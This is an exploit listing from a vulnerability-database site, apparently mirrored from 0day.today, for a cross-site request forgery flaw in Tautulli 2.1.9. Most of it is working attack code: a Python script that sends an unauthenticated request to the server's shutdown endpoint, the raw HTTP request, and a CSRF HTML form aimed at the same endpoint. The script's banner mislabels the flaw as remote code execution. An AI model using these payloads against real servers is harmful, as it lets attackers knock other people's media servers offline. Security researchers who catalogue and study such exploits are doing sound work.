Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown) Vulnerability

🗓️ 18 Dec 2019 00:00:00Reported by İsmail TaşdelenType 
zdt
 zdt🔗 0day.today👁 120 Views

Tautulli v2.1.9 - Cross-Site Request Forgery Vulnerabilit

Code
# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulernability Type : Cross-Site Request Forgery (ShutDown)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
# been discovered that anonymous access can be achieved in applications that do
# not have a user login area and that the remote media server can be shut down.

# PoC Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
 _____ __  _  _ _____ _  _ _   _   _   _   _ ___   __  ___
|_   _/  \| || |_   _| || | | | | | | | \ / (_  | /  |/ _ \
  | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
  |_||_||_|\__/  |_|  \__/|___|___|_|   \_/ |___\/ |_\//_/
     Unauthenticated Remote Code Execution
                                   by Ismail Tasdelen
"""

print(icon)

host = input("[+] HOST: ")
port = input("[+] PORT: ")

response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.

if response.status_code == 200:
    print('[✓] Success!')
elif response.status_code != 200:
    print('[✗] Unsuccessful!')
else:
    exit()

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2019-12-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Dec 2019 00:00Current
7.1High risk
Vulners AI Score7.1
tautullicross-site request forgeryvulnerabilityremote code executionwindows 10python 2.7.11shutdowncsrfpochtmlexploit0day
120